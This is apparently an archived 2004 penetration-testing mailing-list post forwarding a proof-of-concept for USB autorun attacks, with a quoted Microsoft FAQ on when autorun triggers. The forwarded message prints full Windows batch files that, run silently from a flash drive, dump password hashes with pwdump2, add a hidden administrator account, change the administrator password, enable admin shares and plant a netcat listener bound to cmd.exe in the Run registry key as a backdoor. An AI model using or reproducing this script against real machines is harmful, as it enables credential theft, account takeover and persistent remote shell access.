Still, if the simplest solution (autorun) works (and it does...)... why over-complicate like we in the security field tend to do?
Attached is a proof-of-concept as made available by [EMAIL PROTECTED] for using autorun with USB.
This should work. As it was already released, I see nothing wrong with relaying it again (with due credit) here.
I'd strongly suggest to people to read the (different) threads on the subject on the pen-test list, a lot of questions were answered there.
Gadi Evron.
-- Email: [EMAIL PROTECTED] Work: [EMAIL PROTECTED] Backup: [EMAIL PROTECTED] Phone: +972-50-428610 (Cell).
PGP key for attachments: http://vapid.reprehensible.net/~ge/Gadi_Evron.asc
ID: 0xD9216A06 FP: 5BB0 D3E2 D3C1 19B7 2104 C0D0 A7B3 1CF7 D921 6A06
GPG key for encrypted email: http://vapid.reprehensible.net/~ge/Gadi_Evron_Emails.asc
ID: 0x06C7D450 FP: 3B88 845A DF1F 4062 E5BA 569A A87E 8DB7 06C7 D450
--- Begin Message ---In-Reply-To: <[EMAIL PROTECTED]>I have been using this "attack" for some time now. below are the batch files (test.bat, b.bat and autorun.inf. autorun.inf calls test.bat)i use: *********<BOF test.bat> @echo off @start /min b.bat /B @exit <EOF test.bat> *********<BOF b.bat> @explorer . @echo off ::Displaying Computer Information for my reference @echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt @Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt ::Adding a user for me :o) @net user /add __system32__ .z,xmcnvb /fullname:"IPC User" @net localgroup Administrators _system32_ /add ::Hide the Account from being shown on the welcome screen @reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system__" /t REG_DWORD /d 0 /f ::Enabling Admin Shares @reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v @AutoSharewks /t reg_dword /d 1 /f ::Changing Admin Password @net user administrator .;[pl,mkoijnbhu ::Backdooring @copy nc.exe <nc directory> @cd c: @cd <nc directory> @reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "nc directory\nc.exe -L -d -p 80 -e cmd.exe" /f @echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt @echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt @echo ******************************************** >> Essential\DumpIt\sam.txt @cls @exit <EOF b.bat> I have tried this using a flash memmory and it works. what happens is that it opens explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which i have documented above. to prevent against this i have a registry file i use to disable autorun all together. contact me if you need it at: mak_pen(at)hotmail(dot)com Cheers.... >Received: (qmail 20035 invoked from network); 2 Jun 2004 22:23:41 -0000 >Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) >(205.206.231.26) > by mail.securityfocus.com with SMTP; 2 Jun 2004 22:23:41 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) > by outgoing2.securityfocus.com (Postfix) with QMQP > id 62E8414370A; Thu, 3 Jun 2004 00:26:35 -0600 (MDT) >Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm >Precedence: bulk >List-Id: <pen-test.list-id.securityfocus.com> >List-Post: <mailto:[EMAIL PROTECTED]> >List-Help: <mailto:[EMAIL PROTECTED]> >List-Unsubscribe: <mailto:[EMAIL PROTECTED]> >List-Subscribe: <mailto:[EMAIL PROTECTED]> >Delivered-To: mailing list [EMAIL PROTECTED] >Delivered-To: moderator for [EMAIL PROTECTED] >Received: (qmail 27926 invoked from network); 2 Jun 2004 19:49:38 -0000 >X-Originating-IP: [66.130.148.65] >X-Originating-Email: [EMAIL PROTECTED] >X-Sender: [EMAIL PROTECTED] >From: "Fred Gravel" <[EMAIL PROTECTED]> >To: [EMAIL PROTECTED] >Subject: Re: USB delivered attacks >Date: Wed, 02 Jun 2004 20:02:14 +0000 >Mime-Version: 1.0 >Content-Type: text/plain; format=flowed >Message-ID: <[EMAIL PROTECTED]> >X-OriginalArrivalTime: 02 Jun 2004 20:02:14.0500 (UTC) FILETIME=[7FA8F240:01C448DC] > >And after some search ... autorun is possible on a usb storage device... as >it explained just below ... > >http://www.microsoft.com/whdc/device/storage/usbfaq.mspx >Q: What must I do to trigger Autorun on my USB storage device? >If you need to make a USB storage device that executes Autorun, the >following two conditions must both be true: >? > >Media must be marked as removable. >? > >The device can be set to either static or removable. > >We associate the "removable" nature of a device with the bus that it resides >on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI >bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus >would be regarded as removable by default. PnP uses a bit in the >DEVICE_CAPABILITIES structure to determine this. For more information, see >the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located >at >http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp. > >The "removable" nature of media is a property of the device. For example, in >the case of a CD-ROM or a ZIP drive, the medium can be removed without the >device itself going away, but on the other hand the medium and the disk >cannot be separated on static storage PC cards. We obtain this information >by using the StorageDeviceProperty request. For more information, see the >STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at >http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp. > > >---- >Also the autorun could be used in "cooperation" of the desktop.ini file >included in the folder(s) on the usb storage device if needed... > >_________________________________________________________________ >MSN Toolbar provides one-click access to Hotmail from any Web page ? FREE >download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/ > >
--- End Message ---
